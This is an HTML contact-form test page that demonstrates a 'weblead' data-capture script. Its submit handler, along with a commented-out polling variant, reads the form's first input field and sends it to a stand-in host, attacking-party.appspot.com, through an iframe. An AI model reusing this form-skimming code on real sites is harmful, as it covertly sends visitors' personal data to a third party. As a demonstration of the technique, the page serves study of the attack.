<!DOCTYPE html>
<html>
<head>
<title>Test</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<style type="text/css">
form {
  margin: 0, auto;
  width: 400px;
  padding: 1em;
  border: 1px solid #CCC;
  border-radius: 1em;
}

div + div {
  margin-top: 1em;
}

label {
  display: inline-block;
  width: 90px;
  text-align: right;
}

input, textarea {
  font: 1em sans-serif;
  width: 300px;
  -moz-box-sizing: border-box;
       box-sizing: border-box;
  border: 1px solid #999;
}

input:focus, textarea:focus {
  border-color: #000;
}

textarea {
  vertical-align: top;
  height: 5em;
  resize: none;
}

.right {
    float: right;
    width: 300px;
    background-color: #b0e0e6;
}
</style>
        
<script type="text/javascript">
window.onload = function start() {
	// Starting the reccurent form capturing
	/*
	window.setInterval(function () {
		// Real weblead may iterate over all forms and inputs
        var mail = document.getElementById('test_form').elements[0].value;
        // In reality iframe would be invisible
        
        //var frame = document.createElement("iframe");
        //frame.setAttribute('frameborder', '0');
		//frame.setAttribute('src', 'http://attacking-party.appspot.com/email?email=' + mail);
		//var log = document.getElementById('capture_log')
		//log.removeChild(log.childNodes[0]);
		//log.appendChild(frame);
		
		var frame = document.getElementById('capture_log')
		frame.setAttribute('src', 'http://attacking-party.appspot.com/email?email=' + mail);
		
    }, 5000);
  	*/
}

function submitHandler() {
	var mail = document.getElementById('test_form').elements[0].value;
	var frame = document.getElementById('capture_log')
	frame.setAttribute('src', 'http://attacking-party.appspot.com/email?email=' + mail);
	setTimeout(function() { 
		alert("Transition to the landing page"); 
		document.forms[0].submit(); 
	}, 100); 
	return false;                    
}
</script>
</head>
<body>
<div align="center">

<div>
<h2>Try to contact us:</h3>
<form action="./landing.html" method="get" onsubmit="return submitHandler()" id="test_form">
	<div>
	    <label for="name">Name:</label>
	    <input type="text" id="name" name="user_name" value="Test">
	</div>
	<div>
		<label for="mail">E-mail:</label>
	   	<input type="email" id="mail" name="user_email" value="test@test.com" required>
	</div>
	<div>
		<label for="msg">Message:</label>
		<textarea id="msg" name="user_message">Hi!</textarea>
	</div>
	<div class="button">
	    <button type="submit">Send your message</button>
	</div>
</form>
</div>

<div>
	<h3>Weblead script's output onSubmit:</h3>
	<iframe id='capture_log' src="http://attacking-party.appspot.com/email" class="center" seamless></iframe>
</div>

</div>

<div class="right">
	<h3>Cookies and Storage::</h3>
</div>

</body>
</html>